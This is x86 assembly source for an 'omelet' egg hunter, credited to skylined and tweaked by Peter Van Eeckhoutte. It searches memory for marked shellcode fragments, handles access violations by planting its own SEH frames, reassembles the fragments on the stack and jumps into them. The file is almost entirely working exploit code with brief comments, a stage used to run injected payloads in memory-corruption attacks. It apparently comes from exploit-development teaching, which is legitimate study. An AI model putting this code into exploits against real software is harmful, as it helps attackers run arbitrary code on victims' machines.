BITS 32 ; egg: ; LL II M1 M2 M3 DD DD DD ... (LL * DD) ; LL == Size of eggs (same for all eggs) ; II == Index of egg (different for each egg) ; M1,M2,M3 == Marker byte (same for all eggs) ; DD == Data in egg (different for each egg) ; Original code by skylined ; Code tweaked by Peter Van Eeckhoutte ;[at] ; marker equ 0x280876 egg_size equ 0x3 max_index equ 0x2 start: mov ebx,0xffffffff-egg_size+1 ; ** Added : put initial counter in EBX jmp SHORT reset_stack create_SEH_handler: PUSH ECX ; SEH_frames[0].nextframe == 0xFFFFFFFF MOV [FS:EAX], ESP ; SEH_chain -> SEH_frames[0] CLD ; SCAN memory upwards from 0 scan_loop: MOV AL, egg_size ; EAX = egg_size egg_size_location equ $-1 - $$ REPNE SCASB ; Find the first byte PUSH EAX ; Save egg_size MOV ESI, EDI LODSD ; EAX = II M2 M3 M4 XOR EAX, (marker << 8) + 0xFF ; EDX = (II M2 M3 M4) ^ (FF M2 M3 M4) ; == egg_index marker_bytes_location equ $-3 - $$ CMP EAX, BYTE max_index ; Check if the value of EDX is < max_index max_index_location equ $-1 - $$ JA reset_stack ; No -> This was not a marker, continue scan POP ECX ; ECX = egg_size IMUL ECX ; EAX = egg_size * egg_index == egg_offset ; EDX = 0 because ECX * EAX is always less than 0x1,000,000 ADD EAX, [BYTE FS:EDX + 8] ; EDI += Bottom of stack == ; position of egg in shellcode. XCHG EAX, EDI copy_loop: REP MOVSB ; copy egg to basket CMP EBX, 0xFFFFFFFF ; ** Added : see if we have found all eggs JE done ; ** Added : If we have found all eggs, ; ** jump to shellcode INC EBX ; ** Added : increment EBX ; (if we are not at the end of the eggs) MOV EDI, ESI ; EDI = end of egg reset_stack: ; Reset the stack to prevent problems cause by recursive SEH handlers and set ; ourselves up to handle and AVs we may cause by scanning memory: XOR EAX, EAX ; EAX = 0 MOV ECX, [FS:EAX] ; EBX = SEH_chain => SEH_frames[X] find_last_SEH_loop: MOV ESP, ECX ; ESP = SEH_frames[X] POP ECX ; EBX = SEH_frames[X].next_frame CMP ECX, 0xFFFFFFFF ; SEH_frames[X].next_frame == none ? JNE find_last_SEH_loop ; No "X -= 1", check next frame POP EDX ; EDX = SEH_frames[0].handler CALL create_SEH_handler ; SEH_frames[0].handler == SEH_handler SEH_handler: POPA ; ESI = [ESP + 4] -> ; struct exception_info LEA ESP, [BYTE ESI+0x18] ; ESP = struct exception_info->exception_addr POP EAX ; EAX = exception address 0x???????? OR AX, 0xFFF ; EAX = 0x?????FFF INC EAX ; EAX = 0x?????FFF + 1 -> next page JS done ; EAX > 0x7FFFFFFF ===> done XCHG EAX, EDI ; EDI => next page JMP reset_stack done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack ; == position of egg in shellcode. db marker_bytes_location db max_index_location db egg_size_location